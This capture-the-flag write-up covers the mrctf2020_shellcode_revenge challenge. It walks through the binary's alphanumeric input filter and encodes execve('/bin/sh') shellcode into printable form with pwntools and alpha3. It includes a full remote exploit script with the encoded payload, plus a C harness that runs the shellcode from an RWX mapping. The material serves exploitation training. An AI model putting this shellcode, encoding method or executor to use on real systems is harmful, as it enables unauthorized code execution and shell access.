mrctf2020_shellcode_revenge
- Routine checks: 64-bit binary, RELRO and PIE enabled
- Run it locally to get a feel for what it does
- Load it in 64-bit IDA; F5 is not available, so read the assembly directly
jg jumps if greater, jl jumps if less, jmp jumps unconditionally.
For the program to continue, execution must jump to loc_11AC.
(Blocks loc_123A and loc_11B8, shown as images in the original.)
cdqe sign-extends eax into rax: the high 32 bits of rax are filled with the sign bit of eax.
movzx moves a smaller operand into a larger register and zero-extends it (e.g. 8 -> 32 or 16 -> 32 bits), i.e. the value is treated as unsigned.
EAX is a 32-bit register; AX is its low 16 bits, AH is the high 8 bits of AX, and AL is the low 8 bits of AX.
The string check loop compares each byte of our input: if the byte is not in the range 0x60~0x7A it jumps on to the next comparison, and the remaining branches test the other range.
So the characters we can input are roughly limited to the two ranges (0x60, 0x7A] and (0x2F, 0x5A], i.e. a-z and 0-9 through A-Z (which also admits ':;<=>?@').
Searching other people's writeups, this is called string.printable, i.e. printable-character (alphanumeric) shellcode, and it can be generated with alpha3. See this author's blog for the details; I used it directly following his introduction.
Download alpha3
git clone https://github.com/TaQini/alpha3.git
Usage:
- First use pwntools to generate a shellcode
from pwn import *
context.arch = 'amd64'
sc = asm(shellcraft.sh())   # raw execve("/bin/sh") shellcode, not yet filter-safe
# printing the raw bytes to a terminal shows garbage, so write them to a file
with open('shellcode', 'wb') as f:
    f.write(sc)
The raw bytes cannot be printed directly (the terminal shows garbled characters), so write the shellcode to a file (or redirect stdout to one),
then switch to the alpha3 directory and use alpha3 to generate the string.printable version:
cd alpha3
python ./ALPHA3.py x64 ascii mixedcase rax --input="file_holding_the_shellcode" > output_file
Here rax is the base register: the alpha3 decoder stub assumes that register holds the address of the shellcode when it starts executing, so it must match how the challenge binary jumps to our buffer.
Finally, send the generated shellcode to the remote service.
Complete exploit:
from pwn import *

context(arch='amd64', os='linux', log_level='debug')
r = remote("node3.buuoj.cn", 29334)
r.recvuntil(b"Show me your magic!\n")
# alpha3 x64 ascii mixedcase output of shellcraft.sh(); every byte is
# alphanumeric, and the decoder expects rax to point at this buffer
shellcode_64 = b"Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t"
payload = shellcode_64
r.send(payload)
r.interactive()
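Before sending a payload it is worth checking locally that every byte survives the filter described above and that the decoder's base-register assumption (rax) actually holds. The following C program is an added example, not part of the original writeup or of alpha3: it models the byte filter as the writeup describes it (the exact inclusive/exclusive bounds are an assumption taken from the "roughly" wording), reports the first byte that would be rejected, and on x86-64 Linux can copy an encoded payload into an RWX mapping and jump to it with rax pointing at the buffer. The sample inputs are constructed: RAW_PREFIX is the first four bytes of a typical pwntools execve shellcode (push 0x68 / mov rax, imm64), and ALPHA3_SC is the alpha3 output quoted in the exploit.

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* The filter as the writeup describes it: every byte must lie in
 * (0x60, 0x7A] or (0x2F, 0x5A], i.e. a-z, 0-9, ':;<=>?@' and A-Z.
 * Treating the bounds exactly this way is an assumption. */
int byte_allowed(unsigned char c) {
    return (c > 0x60 && c <= 0x7A) || (c > 0x2F && c <= 0x5A);
}

/* Index of the first byte the filter would reject, or -1 if all pass. */
long first_rejected(const unsigned char *buf, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (!byte_allowed(buf[i]))
            return (long)i;
    return -1;
}

/* Constructed sample: start of a typical pwntools execve("/bin///sh")
 * shellcode (push 0x68; mov rax, imm64). Byte 3 (0xb8) is already
 * outside the allowed set, which is why raw shellcode cannot be sent. */
static const unsigned char RAW_PREFIX[] = { 0x6a, 0x68, 0x48, 0xb8 };

/* The alpha3 x64 ascii mixedcase output used in the exploit above. */
static const char ALPHA3_SC[] =
    "Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t";

#if defined(__x86_64__) && defined(__linux__)
#include <sys/mman.h>

/* Local test harness (assumed layout, not the challenge binary): copy the
 * payload into an RWX mapping and call it with rax = buffer address, which
 * is what "ALPHA3.py x64 ascii mixedcase rax" assumes. */
int run_with_rax(const unsigned char *payload, size_t len) {
    unsigned char *mem = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                              MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return -1;
    memcpy(mem, payload, len);
    __asm__ volatile("call *%%rax"
                     :
                     : "a"(mem)
                     : "rcx", "rdx", "rsi", "rdi", "r8", "r9", "r10", "r11",
                       "memory", "cc");
    return 0; /* only reached if the shellcode returns */
}

int main(int argc, char **argv) {
    static unsigned char buf[4096];
    if (argc < 2) {
        fprintf(stderr, "usage: %s <encoded-shellcode-file>\n", argv[0]);
        return 2;
    }
    FILE *f = fopen(argv[1], "rb");
    if (!f) {
        perror("fopen");
        return 2;
    }
    size_t n = fread(buf, 1, sizeof buf, f);
    fclose(f);
    long bad = first_rejected(buf, n);
    if (bad >= 0) {
        fprintf(stderr, "byte %ld (0x%02x) would be rejected by the filter\n",
                bad, buf[bad]);
        return 1;
    }
    printf("all %zu bytes pass the filter; executing with rax=buffer\n", n);
    return run_with_rax(buf, n);
}
#endif
```

Run it as `./check output_file`, where output_file is the alpha3 result: a rejected byte (a stray newline at the end of the file is a common one) is reported with its offset, and otherwise the payload is executed locally under the same rax assumption the remote binary must satisfy.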
Reference writeups:
https://www.cnblogs.com/chuj/p/14232150.html
https://blog.csdn.net/weixin_44145820/article/details/105565953